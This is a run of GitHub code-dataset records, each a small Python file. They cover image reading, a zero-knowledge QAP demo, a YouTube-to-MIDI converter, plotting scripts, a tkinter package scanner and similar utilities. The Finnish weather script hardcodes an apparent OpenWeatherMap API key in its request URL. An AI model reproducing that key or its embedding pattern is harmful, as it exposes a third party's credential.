sys.exit(0)\n","repo_name":"wardahnab/Tugas_3_Pemrograman_Jaringan","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71180798633","text":"# import sif_parser\nimport numpy as np\n# from numpy import unravel_index\n# import matplotlib.pyplot as plt\n# import pandas as pd\n# import xarray\n# import xarray as xr\n# import cv2 as cv\n# import os\n#\n# imag_data = []\n# nor_data = []\n# def readsif(path):\n# for filename in os.listdir(path):\n# print(filename)\n# data = xr.DataArray(sif_parser.xr_open(path + '/' + filename))\n# twodims = data.isel(Time = 0)\n# TwoD = twodims.values\n# print(TwoD)\n# Nor = cv.normalize(TwoD, None, 0, 255, cv.NORM_MINMAX, dtype=cv.CV_8UC1)\n# print(Nor)\n# # plt.imshow(TwoD)\n# # plt.title(filename)\n# # plt.show()\n# imag_data.append(TwoD)\n# nor_data.append(Nor)\n#\n#\n#\n#\n#\n# # def BrightestPoint(imag):\n# # Imag = imag_data[imag]\n# # index = unravel_index(Imag.argmax(),Imag.shape)\n# # return index\n# #\n# #\n#\n#\n\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n# #\n# # da1 = da/da.max()\n# # #\n# # # c = np.argmax(da1)\n# # # # print(c)\n# # d = unravel_index(da1.argmax(),da1.shape)\n# # print(d)\n# # print(da1[d])\n#\n#\n#\n#\n#\n#\n# #\n# # plt.imshow(da1)\n# #\n# # plt.show()\n#\n#\n#\n#\n#\n#\n# # cv.imshow('da',da)\n# # cv.waitKey(0)\n# #\n# # # closing all open windows\n# # cv.destroyAllWindows()\nimport tifffile\nobjimage = []\n# def objreadtif(pathofrobber= '',pathofpositions = '',Shape =None):\ndef objreadtif(pathofrobber='',pathofpositions='',Shape=None):\n read_image = tifffile.imread(pathofrobber)\n np.save('',read_image)\n read_positions = tifffile.imread(pathofpositions)\n np.save('', read_positions)\n # read_positions = sum(read_positions[0:read_image.shape[0]])\n\n if Shape == None:\n for i in range(read_image.shape[0]):\n print(i)\n read = read_image[i,:,:]\n objimage.append(read)\n\n return objimage\n else:\n return read_positions\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n objreadtif()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"sslaocinnnn/Photometric_Stereo_Normals_and_Surface","sub_path":"CaluculateNomral/ObjReadTif.py","file_name":"ObjReadTif.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32014759743","text":"import requests\nimport json\n\npaikkakunta = input(\"Anna pakkakunnan nimi: \")\n\npyyntö = f\"https://api.openweathermap.org/data/2.5/weather?q={paikkakunta}&appid=084a0b57bd89a0ea540a1c0ea1c738ca&units=metric\"\nvastaus = requests.get(pyyntö).json()\nprint(\"Lämpötila:\", json.dumps(vastaus[\"main\"][\"temp\"], indent=2),\"astetta.\")\n\nfor a in vastaus[\"weather\"]:\n print(\"Säätila:\", a[\"description\"])","repo_name":"ShadySeal/ohjelmisto1_","sub_path":"ohjelmisto2/moduuli12/tehtava2.py","file_name":"tehtava2.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21245786001","text":"import numpy as np\n\n# Lets prove we know the answer to x**3 + x + 5 == 35 (x = 5)\n\n# We break it down into these statements:\n\n# L1: s1 = x * x\n# L2: y = s1 * x\n# L3: s2 = y + x\n# L4: out = s2 + 5\n\n# Statements are of the form:\n# a * b = c\n\n# s1 = x * x\n# OR a * b = c, where a = x, b = x and c = s1\nL1 = np.array([\n # a b c\n [0, 0, 0], # 1\n [1, 1, 0], # x\n [0, 0, 0], # out\n [0, 0, 
1], # s1\n [0, 0, 0], # y\n [0, 0, 0] # s2\n])\n\n# y = s1 * x\nL2 = np.array([\n # a b c\n [0, 0, 0], # 1\n [0, 1, 0], # x\n [0, 0, 0], # out\n [1, 0, 0], # s1\n [0, 0, 1], # y\n [0, 0, 0] # s2\n])\n\n# s2 = y + x\nL3 = np.array([\n # a b c\n [0, 1, 0], # 1\n [1, 0, 0], # x\n [0, 0, 0], # out\n [0, 0, 0], # s1\n [1, 0, 0], # y\n [0, 0, 1] # s2\n])\n\n# out = s2 + 5\nL4 = np.array([\n # a b c\n [5, 1, 0], # 1\n [0, 0, 0], # x\n [0, 0, 1], # out\n [0, 0, 0], # s1\n [0, 0, 0], # y\n [1, 0, 0] # s2\n])\n\na = np.array([L.transpose()[0] for L in (L1, L2, L3, L4)])\nb = np.array([L.transpose()[1] for L in (L1, L2, L3, L4)])\nc = np.array([L.transpose()[2] for L in (L1, L2, L3, L4)])\nprint(\"A\")\nprint(a)\nprint(\"B\")\nprint(b)\nprint(\"C\")\nprint(c)\n\n# The witness\ns = np.array([\n 1,\n 3,\n 35,\n 9,\n 27,\n 30\n])\nprint()\n\n#print(s * a * s * b - s * c)\nfor a_i, b_i, c_i in zip(a, b, c):\n assert sum(s * a_i) * sum(s * b_i) - sum(s * c_i) == 0\n\nprint(\"R1CS done.\")\nprint()\n\ndef factorial(x):\n r = 1\n for x_i in range(2, x + 1):\n r *= x_i\n return r\n\ndef combinations(n, r):\n return factorial(n) / (factorial(n - r) * factorial(r))\n\ndef lagrange(points):\n result = np.poly1d([0])\n for i, (x_i, y_i) in enumerate(points):\n poly = np.poly1d([y_i])\n for j, (x_j, y_j) in enumerate(points):\n if i == j:\n continue\n poly *= np.poly1d([1, -x_j]) / (x_i - x_j)\n #print(poly)\n #print(poly(1), poly(2), poly(3))\n result += poly\n return result\n\n# 1.5, -5.5, 7\n#poly = lagrange([(1, 3), (2, 2), (3, 4)])\n#print(poly)\n\ndef make_qap(a):\n a_qap = []\n a_polys = []\n for a_i in a.transpose():\n poly = lagrange(list(enumerate(a_i, start=1)))\n coeffs = poly.c.tolist()\n if len(coeffs) < 4:\n coeffs = [0] * (4 - len(coeffs)) + coeffs\n a_qap.append(coeffs)\n a_polys.append(poly)\n a_qap = np.array(a_qap)\n print(a_qap)\n return a_polys\n\nprint(\"A\")\na_polys = make_qap(a)\nprint(\"B\")\nb_polys = make_qap(b)\nprint(\"C\")\nc_polys = make_qap(c)\n\ndef check(polys, x):\n results = []\n for poly in polys:\n results.append(int(poly(x)))\n return results\n\nprint()\nprint(\"A results at x\", check(a_polys, 1))\nprint()\nprint(\"B results at x\", check(b_polys, 1))\nprint()\nprint(\"C results at x\", check(c_polys, 1))\n\ndef combine_polys(polys):\n r = np.poly1d([0])\n for s_i, p_i in zip(s, polys):\n r += s_i * p_i\n return r\n\nprint()\nprint()\nA = combine_polys(a_polys)\nprint(\"A =\")\nprint(A)\nB = combine_polys(b_polys)\nprint(\"B =\")\nprint(B)\nC = combine_polys(c_polys)\nprint(\"C =\")\nprint(C)\nprint()\nt = A * B - C\nprint(\"t =\")\nprint(t)\n\n# 4 statements in our R1CS: L1, L2, L3, L4\ndivisor_poly = np.poly1d([1])\nfor x in range(1, 4 + 1):\n divisor_poly *= np.poly1d([1, -x])\n\nquot, remainder = np.polydiv(t, divisor_poly)\nassert len(remainder.c) == 1\nprint()\nprint(\"Result of QAP:\")\nprint(int(remainder.c[0]))\n","repo_name":"darkrenaissance/darkfi","sub_path":"script/research/zk/groth16/qap.py","file_name":"qap.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":973,"dataset":"github-code","pt":"72"} +{"seq_id":"8960182182","text":"import os\nimport shutil\nimport numpy as np\n\n\nos.chdir('../cat_vs_dog_datasets')\n# print(os.listdir('./train'))\nfile_names = os.listdir('./train')\nif not os.path.exists('val'):\n os.mkdir('./val')\n\nwhile len(os.listdir('./val')) < 5000:\n file_name = np.random.choice(os.listdir('./train'))\n shutil.move('./train/' + file_name, './val/' + file_name)\n\n\n\n# 
shutil.move()\n","repo_name":"qukequke/tutor","sub_path":"torch_tutor/scipt_for_val.py","file_name":"scipt_for_val.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23610481604","text":"#!/usr/bin/python3\n\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup\nfrom googlesearch import search\n\nq=' '.join(sys.argv[1:])\nprint(\"Query: \" + q)\n\ns=search(q, stop=5)\n\nfor url in s:\n print(\"Result URL: \" + url)\n\n # Get first result\n page=requests.get(url)\n\n # find all code blocks\n soup = BeautifulSoup(str(page.content), features=\"lxml\")\n code = soup.findAll('code')\n\n for block in code:\n # replace br\n for br in block.find_all(\"br\"):\n br.replace_with(\"\\n\")\n\n # Print out one by one\n print(block.decode_contents())\n input(\"\\n\\nPress Enter for next code block...\\n\")\n\n if len(code) > 0:\n break\n else:\n print(\"No solution found, checking next URL\")\n\n \n\n","repo_name":"ayoung012/miracle-worker","sub_path":"miracleworker.py","file_name":"miracleworker.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27596811437","text":"import pandas as pd\nimport math\nfrom collections import Counter\nimport os\nimport matplotlib\nimport sys\nimport numpy as np\n\ndef summary(path):\n data = pd.read_csv(path)\n text = list(data['text'])\n label = data['label']\n sample_num = len(text)\n # \n words_len = list(map(len_def, text))\n max_len = max(words_len)\n min_len = min(words_len)\n avg_len = sum(words_len) / sample_num\n words_len_cut = list(map(len_def1, text))\n avg_len_cut = sum(words_len_cut) / sample_num\n\n clusters = Counter(label)\n clusters_num = len(clusters)\n cluster_r = max(clusters.values()) / min(clusters.values())\n print('cluster_distribution:', sorted(np.array(list(clusters.values())) / sample_num))\n print('cluster_num:', clusters_num)\n #print('clusters:', clusters)\n print('sample_num:', sample_num)\n #print('max len:', max_len)\n #print('min len:', min_len)\n #print('cluster max/min:', cluster_r)\n #print('avg len:', avg_len)\n #print('avg_len_cut:', avg_len_cut)\n \ndef len_def(text):\n return len(text.split())\n\ndef len_def1(text):\n tmp = len(text.split())\n return tmp if tmp <= 32 else 32\n\ndef get_text(dataname, datapath='/home/hml/text_cluster/sccl/AugData/augmented-datasets', target='./agnews.csv'):\n source = os.path.join(datapath, dataname+\".csv\")\n train_data = pd.read_csv(source)\n data1 = train_data[train_data['label'] == 3][:2000]\n data2 = train_data[train_data['label'] == 2][:1200]\n data3 = train_data[train_data['label'] == 1][:800]\n new_data = pd.concat([data1, data2, data3])\n new_data.to_csv(target, index=False)\n return\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n data_name = 'searchsnippets_trans_subst_10'\n get_text(dataname=data_name, target='./search.csv')\n elif sys.argv[1] == 'sum':\n root_path = '/home/hml/text_cluster/sccl/AugData/augmented-datasets'\n data_names = ['agnewsdataraw-8000_trans_subst_10.csv', 'stackoverflow_trans_subst_10.csv', 'biomedical_trans_subst_10.csv', 'searchsnippets_trans_subst_10.csv', 'TS_trans_subst_10.csv', 'T_trans_subst_10.csv', 'S_trans_subst_10.csv', 'tweet-original-order_trans_subst_10.csv']\n #root_path = '/home/hml/text_cluster'\n #data_names = ['agnews.csv']\n for data_name in data_names:\n print(data_name)\n path = os.path.join(root_path, data_name)\n 
summary(path)\n elif sys.argv[1] == 'data':\n #data_name = 'agnewsdataraw-8000_trans_subst_10'\n data_name = 'searchsnippets_trans_subst_10'\n get_text(dataname=data_name, target='./search.csv')","repo_name":"hmllmh/RSTC","sub_path":"dataloader/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"22605941547","text":"from youtube_dl import YoutubeDL\nfrom os.path import join, dirname, splitext\nfrom os import remove\nimport subprocess\nimport platform\nfrom typing import List\n\nMASK = join(dirname(__file__), \"syn2midi\", \"mask.bmp\")\nMASK88 = join(dirname(__file__), \"syn2midi\", \"mask88.bmp\")\n\n\ndef download_and_convert(youtube_url: str, mask_path: str = MASK88, output_name: str = None, start_time: int = None, end_time: int = None, transpose: int = 0, additional_arguments: List[str] = [], keep_video: bool = False) -> None:\n \"\"\"\n Download a Synthesia piano tutorial from YouTube and convert it to MIDI format.\n\n Parameters\n ----------\n youtube_url: str\n The YouTube URL for a Synthesia piano tutorial.\n mask_path: str\n Path to a BMP image file to be used as mask.\n output_name: str\n Path to output MIDI file.\n start_time: int | None\n Vide start time in seconds.\n end_time: int | None\n Vide end time in seconds.\n transpose: int\n Transpose notes shift, can be negative.\n additional_arguments: List[str]\n List of additional arguments to be passed to syn2midi.\n keep_video: bool\n If set to True, will keep the downloaded video instead of deleting it when done.\n \"\"\"\n filename = _download(youtube_url)\n output_name = output_name or splitext(filename)[0] + \".mid\"\n\n syn2midi = _get_syn2midi()\n args = [syn2midi, \"-i\", filename, \"-o\",\n output_name, \"-m\", mask_path, \"-t\", str(transpose)]\n args += [\"-s\", str(start_time)] if start_time is not None else []\n args += [\"-e\", str(end_time)] if end_time is not None else []\n args += additional_arguments\n\n print(output_name)\n\n subprocess.run(args)\n\n if not keep_video:\n print(\"Deleting video...\")\n try:\n remove(filename)\n except Exception:\n print(\"Could not delete video.\")\n else:\n print(\"Video deleted.\")\n\n\ndef _download(url: str) -> str:\n with YoutubeDL() as ydl:\n format_id = _get_format_id(ydl, url)\n\n filename = []\n options = {\n \"format\": format_id,\n \"progress_hooks\": [_get_hook(filename)]\n }\n with YoutubeDL(options) as ydl:\n ydl.download([url])\n\n return filename[0]\n\n\ndef _get_hook(result: list):\n def hook(progress):\n if progress[\"status\"] == \"finished\":\n result.append(progress[\"filename\"])\n\n return hook\n\n\ndef _get_format_id(ydl: YoutubeDL, url: str):\n meta = ydl.extract_info(url, download=False)\n formats = meta.get(\"formats\", [meta])\n mp4_formats = [format for format in formats if format[\"ext\"] == \"mp4\"]\n mp4_720 = [format[\"format_id\"]\n for format in mp4_formats if format[\"height\"] == 720]\n if mp4_720:\n return mp4_720[0]\n\n mp4_formats.sort(key=lambda format: format[\"height\"])\n return mp4_formats[-1]\n\n\ndef _get_syn2midi():\n systems = {\n \"Windows\": join(\"windows\", \"syn2midi.exe\")\n }\n\n os = platform.system()\n\n if os not in systems:\n raise OSError(\"Operating system not supported\")\n\n executable = systems[os]\n\n return join(dirname(__file__), \"syn2midi\", executable)\n\n\nSYN2MIDI = 
_get_syn2midi()\n","repo_name":"AntarEspadas/youtube2midi","sub_path":"youtube2midi/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"17620701742","text":"from visdom import Visdom\nimport numpy as np\n\nimport time\n\nviz = Visdom()\nx,y = 0,0\nwin = viz.line(\n X=np.array([x]),\n Y=np.array([y]),\n opts=dict(title='two lines')\n )\n\nfor i in range(10):\n x += i\n y += i*i\n viz.line(\n X = np.array([x]),\n Y = np.array([y]),\n win=win,\n update='append'\n )\n time.sleep(5)\n","repo_name":"csliuwei/learn_visdom","sub_path":"03_line_update.py","file_name":"03_line_update.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73818441192","text":"from cx_Freeze import setup, Executable\n\nimport sys\n\nfrom src.utility import get_environment\n\nenvironment = get_environment('src\\\\assets\\\\environment.json')\n\nbase = 'Win32GUI' if sys.platform == 'win32' else None\n\nshortcut_table = [\n (\"DesktopShortcut\", # Shortcut\n \"DesktopFolder\", # Directory_\n \"Mer.io\", # Name\n \"TARGETDIR\", # Component_\n \"[TARGETDIR]mer.io.exe\", # Target\n None, # Arguments\n None, # Description\n None, # Hotkey\n '', # Icon\n None, # IconIndex\n None, # ShowCmd\n 'TARGETDIR' # WkDir\n )\n ]\n\nbuild_options = {\n 'packages': [],\n 'excludes': [],\n 'include_files': ['src/assets'],\n}\n\nmsi_options = {\n 'target_name': 'mer.io_{0}_setup'.format(environment['version']),\n 'upgrade_code': '{2967c71a-9bf5-48be-b9db-b2c5a6c9fab6}',\n 'data': {'Shortcut': shortcut_table}\n}\n\nexecutables = [\n Executable('src/main.py',\n base=base,\n target_name='mer.io',\n icon='src/assets/icons/app_icon.ico')\n]\n\nsetup(name='mer.io',\n version=environment['version'],\n description='mer extraction tool',\n options={\n 'build_exe': build_options,\n 'bdist_msi': msi_options\n },\n executables=executables,\n )\n","repo_name":"jooppoelman/mer.io","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23206588960","text":"from pdf2image import convert_from_path, convert_from_bytes\n\nfrom pdf2image.exceptions import (\n PDFInfoNotInstalledError,\n PDFPageCountError,\n PDFSyntaxError\n)\n\nimport os\n\nfolder = os.getcwd()\nprint(folder)\n\nfor files in folder:\n for filename in os.listdir():\n full = os.path.join(folder, filename)\n #print(\"Part\", part)\n print(\"Full\", full)\n\n images = convert_from_path(full)\n \n for i in range(len(images)):\n \n images[i].save('page'+ str(i) +'.jpg', 'JPEG')\n \n","repo_name":"holmesian17/pdf_obits_files","sub_path":"single_folder_pdf_jpg.py","file_name":"single_folder_pdf_jpg.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30676850766","text":"# -*- coding: utf-8 -*- \nimport numpy as np \nimport matplotlib.pyplot as plt\nx = np.linspace(-1, 1, 10000) \ny = (x**2/2+x+1)\nz = (2.7**x)\n \nplt.figure(figsize=(8,4)) \nplt.plot(x,y,color=\"red\",linewidth=2) \nplt.plot(x,z,color=\"blue\") \nplt.xlabel(\"Time(s)\") \nplt.ylabel(\"Volt\") \nplt.title(\"PyPlot First Example\") \nplt.ylim(-1,3) \nplt.legend() \nplt.show() 
","repo_name":"youngda/numpy","sub_path":"x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26198648965","text":"\n\n#import library modules\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom collections import Counter\nimport datetime\nimport xlrd\nimport xlwt\n\n\n#current time & date\nnow = datetime.datetime.now()\nprint (now.strftime(\"%m-%d-%Y\"))\n\n#tkinter window\nroot = Tk()\n\nroot.iconbitmap('icon.ico')\n\n#tkinter window title\nroot.title(\"Package Scanner\")\n#tkinter window size\nroot.geometry(\"550x500\")\n\n\n#Entrada Label\nentradaLabel = Label(root, text=\"Entrada\")\nentradaLabel.grid(row = 2, column = 0, sticky = NSEW,columnspan = 1)\n\n#Total in Label\nquantityLabel = Label(root, text=\"Total In\")\nquantityLabel.grid(row = 2, column = 2 , sticky = NSEW, columnspan = 1)\n\n#Total Out Label\nquantityOutLabel = Label(root, text=\"Total Out\",width=15)\nquantityOutLabel.grid(row = 2, column = 9 , sticky = NSEW, columnspan = 1)\n\n#Instructions to scan Label\nentry1Label = Label(root, text=\"Scan Package:\")\nentry1Label.grid(row = 0, column = 0 , sticky = NSEW)\n\n#Salida Label\nsalidaLabel = Label(root, text=\"Salida\",width=15)\nsalidaLabel.grid(row = 2, column = 7 , sticky = NSEW, columnspan = 1)\n\n\n#save and send buttons\nbutton1 = Button(root,text = 'Save', fg='green')\nbutton2 = Button(root,text = 'Send', fg='red')\n#button1.grid(row=3,column=0)\n#button2.grid(row = 3 , column = 1)\n\n#Scanner Entry Field\nentry1 = Entry(root)\nentry1.grid(row = 0,column = 2,columnspan = 3)\nentry1.focus_set()\n\nquitButton = Button(root,text=\"Quit\", command = root.quit )\n#quitButton.grid(row=1,column=12)\n\n\n\n#Define Variables and Arrays\nscanIn = []\nscanOut = []\nstartRowSave = 1\nstartRow = 3\ninCount=0\noutCount=0\n\n\n#Menu Taskbar\nmenu = Menu(root)\nroot.config(menu=menu)\nsubMenu = Menu(menu)\nfileMenu = Menu(menu)\nmenu.add_cascade(label=\"File\", menu=fileMenu)\nmenu.add_cascade(label=\"Scan Mode\", menu=subMenu)\n\n\n#Menu Taskbar Commands\n\n#start file save\ndef file_save():\n f = filedialog.asksaveasfile(mode='w', defaultextension=\".txt\",initialdir = \"%userprofile%/desktop/\",title = \"Save file\",filetypes = ((\"Text file\",\"*.txt\"),(\"Excel file\",\"*.xls\"),(\"all files\",\"*.*\")))\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n text2saveFurgon = str(furgon.get())\n f.write(\"Furgon\")\n f.write(\"\\n\")\n f.write(text2saveFurgon)\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"Total In\")\n #end check if list empty\n\n f.write(\"\\n\")\n #check if list is empty\n #if item in storedIn:\n text2saveIn = str(inCounter)\n f.write(text2saveIn)\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"Total Out\")\n f.write(\"\\n\")\n #if item in storedOut:\n text2saveOut = str(outCounter)\n f.write(text2saveOut)\n f.write(\"\\n\")\n #f.write(\"Scan Details\")\n #f.write(\"\\n\")\n #f.write(timestamp)\n f.close()\n print(storedIn,storedOut)\n#end file save\n\ndef entradaMode():\n global mode\n print(\"Entrada Selected\")\n mode = \"Entrada\"\n select = Label(root, text=\" Scan mode: \" + mode, fg='green',width = 17)\n select.grid(row=0, columnspan=2, sticky=NSEW)\n\ndef salidaMode():\n print(\"Salida Selected\")\n global mode\n global furgon\n global furgonNumber\n global furgonLabel\n\n mode = \"Salida\"\n select = Label(root, text=\"Scan mode: \" + mode, fg='red',width = 17)\n 
select.grid(row=0, columnspan=2, sticky=NSEW)\n\n # Furgon Entry Field\n furgonLabel = Label(root, text=\"Furgon: \")\n furgonLabel.grid(row=0, column= 8, sticky=E,columnspan=1)\n furgon = Entry(root)\n furgonNumber = furgon.get()\n furgon.grid(row=0, column=9, columnspan=1,sticky=E)\n #\n\nclass savetoexcel:\n\n def save2Excel():\n\n style0 = xlwt.easyxf('font: name Times New Roman, color-index red, bold on',\n num_format_str='#,##0.00')\n style1 = xlwt.easyxf(num_format_str='D-MMM-YY')\n\n wb = xlwt.Workbook()\n ws = wb.add_sheet('A Test Sheet', cell_overwrite_ok=True)\n wsLog = wb.add_sheet('Scan Log', cell_overwrite_ok=True)\n\n ws.write(0, 0, \"Total In\", style0)\n ws.write(1, 0, str(storedIn) , style1)\n ws.write(2, 0, )\n ws.write(0, 1, \"Total Out\", style0)\n ws.write(1, 1, str(storedOut))\n ws.write(0, 2, \"Furgon\", style0)\n ws.write(1, 2, furgonNumber, style1)\n ws.write(2, 2, xlwt.Formula(\"A3+B3\"))\n wsLog.write(0, 0, \"Scan Log\", style0)\n wsLog.write(1, 0, timestamp, style1)\n print (content)\n\n\n wb.save('Z:/Reciving Almacen/Entradas y Salidas/example.xls')\n\n def saveScan(startRowIn, timestamp):\n\n\n style0 = xlwt.easyxf('font: name Times New Roman, color-index red, bold on',\n num_format_str='#,##0.00')\n style1 = xlwt.easyxf(num_format_str='D-MMM-YY')\n\n wb = xlwt.Workbook()\n ws = wb.add_sheet('A Test Sheet', cell_overwrite_ok=False)\n wsLog = wb.add_sheet('Scan Log', cell_overwrite_ok=False)\n wsLog.write(0, 0, \"Scan Log\", style0)\n\n wsLog.write(startRowIn, 0, timestamp, style1)\n print(\"printed from savescan\")\n wb.save('Z:/Reciving Almacen/Entradas y Salidas/' + now.strftime(\"%m-%d-%Y\") + '.xls')\n\n\n\nsubMenu.add_command(label=\"Entrada\", command=entradaMode)\nsubMenu.add_command(label=\"Salida\", command=salidaMode)\n\nfileMenu.add_command(label=\"Save As\",command = file_save)\n#fileMenu.add_command(label=\"Save to Excel\",command = savetoexcel.save2Excel)\n\nfileMenu.add_command(label=\"Exit\", command=root.quit)\n\n\nmode = \"\"\ncontent = entry1.get()\ntimestamp = \"Package \" + content + \" Scanned at \" + now.strftime(\"%m-%d-%Y %H:%M\")\n\nsubMenu.add_separator()\n\ndef func(event):\n\n\n global inCount\n global outCount\n global storedIn\n global storedOut\n content = entry1.get()\n\n\n if content == \"\":\n print(\"No Package Scanned\")\n print(mode)\n\n elif mode == \"Entrada\":\n timestamp = \"Package \" + content + \" Scanned at \" + now.strftime(\"%m-%d-%Y %H:%M\")\n print( timestamp)\n\n scanIn.append(content)\n\n startRowIn = 2\n for i in scanIn:\n inLabel = Label(root, text=i)\n inCount += 1\n inLabel.grid_forget()\n startRowIn = startRowIn + 1\n\n\n\n inLabel.grid(sticky=NSEW, column=0,row=startRowIn)\n global inCounter\n inCounter = Counter(scanIn)\n inCounter = inCounter.most_common()\n\n startRow = 3\n for value, count in inCounter:\n storedIn = value, \"-\" ,count\n counterLabel = Label(root, text = storedIn)\n counterLabel.grid(column=2,columnspan = 1,row = startRow, sticky = NSEW)\n startRow = startRow + 1\n\n print(storedIn)\n savetoexcel.saveScan(startRowSave,timestamp)\n\n entry1.delete(0, 'end')\n\n\n else:\n print( \"Package \" + content + \" Scanned at \" + now.strftime(\"%m-%d-%Y %H:%M\"))\n scanOut.append(content)\n\n startRowOut = 2\n for i in scanOut:\n outLabel = Label(root, text=i,width=15)\n outLabel.grid_forget()\n outCount += 1\n startRowOut = startRowOut + 1\n\n outLabel.grid(sticky=W, column=7,row=startRowOut)\n\n entry1.delete(0, 'end')\n\n global outCounter\n outCounter = (Counter(scanOut))\n outCounter = 
outCounter.most_common()\n\n startRow = 3\n for value, count in outCounter:\n storedOut = value, \"-\", count\n counterOutLabel = Label(root, text=storedOut,width=15)\n counterOutLabel.grid(column=9, columnspan=1, row=startRow, sticky=NSEW)\n startRow = startRow + 1\n\n if scanIn == scanOut:\n counterOutLabel.config(fg=\"green\")\n furgonLabel.config(fg=\"green\")\n\n\n entry1.delete(0, 'end')\n\n\n\n\n\n #inCounter = Counter(scanIn)\n #inCounter = inCounter.most_common()\n # for value, count in inCounter:\n\n # print(value, count)\n\n\n # totalInLabel = Label(root, text=inCounter)\n # totalInLabel.grid(row= 3, column = 8)\n\n\n\nentradaMode()\nroot.bind('', func)\n\n\n\nroot.mainloop()","repo_name":"coolrey3/python","sub_path":"Programa de Entrada/package scanner.py","file_name":"package scanner.py","file_ext":"py","file_size_in_byte":7961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38583605427","text":"from real_data.plot_brains import plot_blobs\nfrom build_data import build_coefs\nfrom matplotlib import pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\nfrom real_data.utils import get_labels\n\n\nparams = {\"legend.fontsize\": 19,\n \"axes.titlesize\": 17,\n \"axes.labelsize\": 16,\n \"xtick.labelsize\": 14,\n \"ytick.labelsize\": 14}\nplt.rcParams.update(params)\n\nn_subjects = 6\nnames = [f\"Subject {i}\" for i in range(1, n_subjects + 1)]\ncolors = plt.cm.hsv(np.linspace(0, 1, n_subjects))[:, :-1]\ncolors[0] = np.array([0, 0, 0])\nlegend_models = [Line2D([0], [0], color=\"w\",\n markerfacecolor=color, markersize=13,\n linewidth=3,\n marker=\"o\",\n label=name)\n for color, name in zip(colors, names)]\nf, ax = plt.subplots(1, 1, figsize=(8, 2))\nax.legend(handles=legend_models, ncol=3, frameon=False,\n labelspacing=1.5)\nax.axis(\"off\")\nplt.savefig(\"real_data/fig/coefs_legend.pdf\")\n\n\ndataset = \"camcan\"\nseed = 0\noverlap = 50\nn_sources = 5\n\nlabel_names = [\"S_interm_prim-Jensen\",\n \"G_and_S_transv_frontopol\",\n \"S_oc_sup_and_transversal\",\n \"Lat_Fis-ant-Horizont\",\n \"S_collat_transv_post\"]\nlabels = get_labels(label_names, annot_name=\"aparc.a2009s\", hemi=\"lh\")\ncoefs = build_coefs(n_tasks=n_subjects, overlap=overlap,\n n_sources=n_sources, seed=seed,\n positive=True, labels_type=\"any\",\n dataset=dataset)\ncoefs += np.random.randn(*coefs.shape) * 10\n\nviews = [dict(azimuth=-135.40236255883042,\n elevation=78.58822778745676,\n distance=437.24652099609347,\n focalpoint=np.array([0., 1.28382111, 0.]),\n roll=77.61442413729858), \"lateral\"]\n\nfor i, view in enumerate(views):\n fname = \"real_data/fig/coefs_-v%i.png\" % i\n plot_blobs(np.concatenate((coefs, coefs)), subject='fsaverage',\n save_fname=fname,\n title=None, surface=\"inflated\", text=\"\", hemi=\"lh\",\n background=\"white\", views=view, top_vertices=2500,\n dataset=dataset, labels=labels,\n figsize=(800, 800))\n","repo_name":"hichamjanati/neuroimage-multi-subject-2020","sub_path":"plot_fig2.py","file_name":"plot_fig2.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36681272212","text":"from multimetric.cls.base import MetricBase\nfrom multimetric.cls.tokentree import TokenTree\nfrom multimetric.cls.tokentree import TokenTreeConfig\n\n\nclass MetricBaseFanout(MetricBase):\n _config = {\n 'Go': TokenTreeConfig(\n start=[('Token.Keyword.Namespace', 'import')],\n end=[('Token.Punctuation', r'\\)')],\n 
